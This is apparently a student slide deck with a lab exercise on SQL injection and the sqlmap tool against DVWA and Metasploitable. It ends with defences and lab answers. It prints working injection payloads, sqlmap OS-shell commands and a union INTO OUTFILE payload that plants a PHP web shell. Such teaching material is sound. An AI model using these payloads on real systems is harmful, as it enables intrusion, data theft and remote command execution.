SQL Injection

SQL
Injection
Username
Password

Rushi, Abhinav, Yuvaraj, Xingmeng

SQL
●

Special Programming Language for handling data stored in Relational
Database Management Systems (RDBMS)

●

Used to insert, display and store information from a website on a server.

●

Essential for dynamic websites

●

Works on the servers. For example : Apache, MS server etc.

SQL Injection
●

Detects and exploits database flaws to take control of entire database

●

Checks for vulnerabilities in:
○

Forms (Username, Password and other fields of forms)

○

URLs (Data requests sent to servers to fetch or write data)

●

Fingerprints the back-end DBMS

●

Enumerates or retrieves data of interest such as table dumps, usernames,
passwords etc.

●

Eventually exploiting the system once useful data is obtained such as - OS
takeover, web server takeover, data change etc.

SQLMAP - The Tool
●

Open source penetration testing tool

●

Automates the process of detecting and exploiting SQL injection flaws and
taking over of database servers

●

Comes with a powerful detection engine,

●

Broad range of switches lasting from
○

database fingerprinting,

○

over data fetching from the database,

○

to accessing the underlying file system

○

executing commands on the operating system via out-of-band
connections.

Utility of Tool
●

Attacking vulnerable websites

●

Protecting your own websites from exploits

[!] legal disclaimer: Usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility to
obey all applicable local, state and federal laws. Developers assume
no liability and are not responsible for any misuse or
damage caused by this program

Developers

Miroslav Stampar

Bernardo Damele A. G.

Injectable Parameters
Example URL ->
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1
We want to check if the id parameter is injectable we will try the following code
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2
The first address returns the same webpage as the original URL [TRUE]
The second address returns a page different from the original URL [FALSE]
Therefore we know that the id parameter is injectable because the backend database evaluates the appended
statement to true, and to false correctly.

Automatic Payloads
●

Payloads are injected SQL statements used to try and grab data from the web-site

●

Example Payload- >

http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20DISTINCT%
28IFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%29%20FROM%
20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%206%2C1%29%2C11%2C1%29%29%3E56%20AND%20%
27eHhW%27%3D%27eHhW&Submit=Submit
●

Clearly payloads are complicated and hence the process is automated by creating them based on the underlying
DBMS, OS and web-server

●

These payloads are created and tested to grab information from the underlying database by attempting to gain
access to the INFORMATION_SCHEMA

●

The INFORMATION_SCHEMA contains information about users, tables and procedures

●

If no schema is found, sqlmap has a collection of 5 k table names and column names it can use in brute force.

Attack Payloads
Normal Page
More Data
Returned

Some data returned

Fingerprinting Mechanism
- The underlying web-server is detected through HTTP cookies and headers, similar to what we saw in
class
- The DBMS is fingerprinted through error message parsing, banner parsing and version specific
payloads.

The Command
Executing SQLMap
Target URL + SQL Injection

python sqlmap.py -u "http://172.16.151.140/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit#" --cookie="
PHPSESSID=18884db21c1ac46083760375da62d10c; security=low"

Browser Session ID

Injection Techniques
1.

Boolean

2.

Error-based

3.

Time-based

4.

Union Attack.

5.

Stacked queries

Boolean Based Blind
The command flag:
--technique b

How does it work:
1.

“Blind” is when the results of the SQL injection are not visible to the attacker.

2.

“Boolean” means that the injected SQL can either be evaluated to TRUE or FALSE

3.

Together-> The web-page is displayed differently based on whether the injected statement
evaluates to TRUE or FALSE

For example ‘ and 1=2 [FALSE]

Error Based Blind
The command flag:
--technique E
How does it work:
●

Works only when the web application has been configured to disclose back-end DBMS error messages
“Invalid query: You have an error in your SQL syntax; check the manual that

corresponds to your
MySQL server version for the right syntax to use near ''' at line 1”
●

Detect the backend DBMS by passing random values to the id parameter
causing it to throw an error
“http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1”

Time Based Blind
The command flag:
--technique t

How does it work:
1.

2.

sqlmap replaces or appends to the affected parameter in the HTTP
request, a syntactically valid SQL statement string containing a query
which put on hold the back-end DBMS to return for a certain number of
seconds.
For each HTTP response, by making a comparison between the HTTP
response time with the original request, the tool inference the output of the
injected statement character by character.

For example select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10'

Union Attack Technique
The command flag:
--technique u

How does it work:
1.

Using the boolean-based attack and error based attacked to guess the database type and # of
column and column type

2.

Using the Union keyword to execute the command to obtain the useful information.

For example ‘ and 1=2 Union select password from users

Stacked Query Attack
1.

Allow to use the “;” in the sql injection command to execute command.

2.

It is always used to upload a file when conducting sql-injection.

NB: MySQL-PHP are widely use but stacked query is not allowed by default to
security reason

User, Password and Table Enumeration
The command:
--dbs --all, --dbs --users, --dbs --current-user

How to execute the arbitrary command:
●
●

After successfully attacking the database, sqlmap will output all the information
about the available users, passwords, tables, columns and much more
Dictionary based attack can be used to crack the passwords.

Execute Arbitrary Commands
The command:
--sql-shell

How to execute the arbitrary command:
After successfully attacking the database,there will be a sql-shell command line to tell
you to execute sql command;
The Example Output screenshot as follows:

Execute Arbitrary Commands
(Cont..)
The example of executing command: select * from users

How it works: Once the username and password are known for a DB user, then
we can remotely connect to the DB and run SQL

OS Takeover
●

Run commands on the underlying operating system of the server

●

Flags
○

--os-shell -> access to a remote shell

○

--os-cmd -> run a command on the server

●

Example

●

Works by SQLmap uploading a binary executable containing two user defined functions

--os-cmd pwd

sys_eval() and sys_exec() to the the database and then running them to access the database.

How to Defend SQL Injection Attack
1. Comprehensive data sanitization.
We have to limit the data type of user input data for different web application. For example, if we
develop an application for phone number, then the only data type is int and the value is (0~9).
2. Use a web application firewall.
There existing a popular and open source module ModSecurity. This module is available for the three
most popular web servers,like,Apache Microsoft IIS and nginx. Except this feature, it also provides a
complicated and ever-evolving set of rules to protect the web servers from being attacked.
3. Limit database privileges by context.
Taking an example, if we have admin user, normal working user and other group user. We need to
differ the credential tables into 3 levels. Hence even the attackers successfully attacks the table. And
only low credential tables will be shown.
4. Avoid constructing SQL queries with user input.
Using prepared SQL statements or procedures to deal with user inquiry will enhance the safety of a
database.

References
Reference link:
https://github.com/sqlmapproject/sqlmap
Homepage: http://sqlmap.org
Download: .tar.gz or .zip
Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
User's manual: https://github.com/sqlmapproject/sqlmap/wiki
Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
Twitter: @sqlmap
Demos: #1 and #2
Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
http://www.esecurityplanet.com/hackers/how-to-prevent-sql-injection-attacks.html

Lab Questions
1.How is time-based sql injection different from other types of SQL
injection?
2. What Changes would you make to the DVWA system to prevent this
type of attacks?

Answers
1. There is no big difference between “regular” boolean attack and
time-based boolean attack. The “Normal” blind attack is based on the
difference between the returned values. If there is no difference in the
returned value then the time-based attack will be used.
2. Sanitize input, limit database privileges, avoid using direct user input
to form DB queries.

3) In this part we will gain access to a shell in the browser without the use of SQLmap
3.1) Navigate to [metasploitable IP] /dvwa/vulnerabilities/sqli/ using a browser in KALI
3.2) Which PHP statement will allow you to run a command on the underlying OS?
<? system($_REQUEST['cmd']);?>
3.3) By submitting things using the submission box find out which parameter is injectable
id
3.4) Run the payload ' union select "TEXT",2 INTO OUTFILE '/tmp/im_in.txt'#
3.5) View the contents of the /tmp/im_in.txt file Metasploitable
3.6) Using the 3.4 and 3.2 craft a payload to run commands on metasploitable from the Kali browser
union select "<? system($_REQUEST['cmd']);?>",2 INTO OUTFILE '/var/www/test/execcmp.
php'#

SQL Injection

More Related Content

SQL Injection